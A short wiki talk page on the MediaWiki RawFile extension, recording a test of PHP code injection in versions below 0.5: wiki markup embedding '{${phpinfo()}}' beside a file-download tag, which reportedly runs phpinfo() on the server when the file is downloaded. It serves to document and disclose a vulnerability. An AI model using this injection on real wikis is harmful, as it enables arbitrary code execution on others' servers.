Talk:Mediawiki RawFile

From YobiWiki
Jump to navigation Jump to search

Testing PHP code injection on Rawfile < 0.5 :
Adding this code to a wikipage:

<nowiki>{${phpinfo()}}</nowiki>
[{{#file: myscript.sh}} as myscript.sh]
<source lang=bash>
#!/bin/bash

echo 'Hello world!'
exit 0
</source>

and trying to download myscript.sh will execute phpinfo() on the server.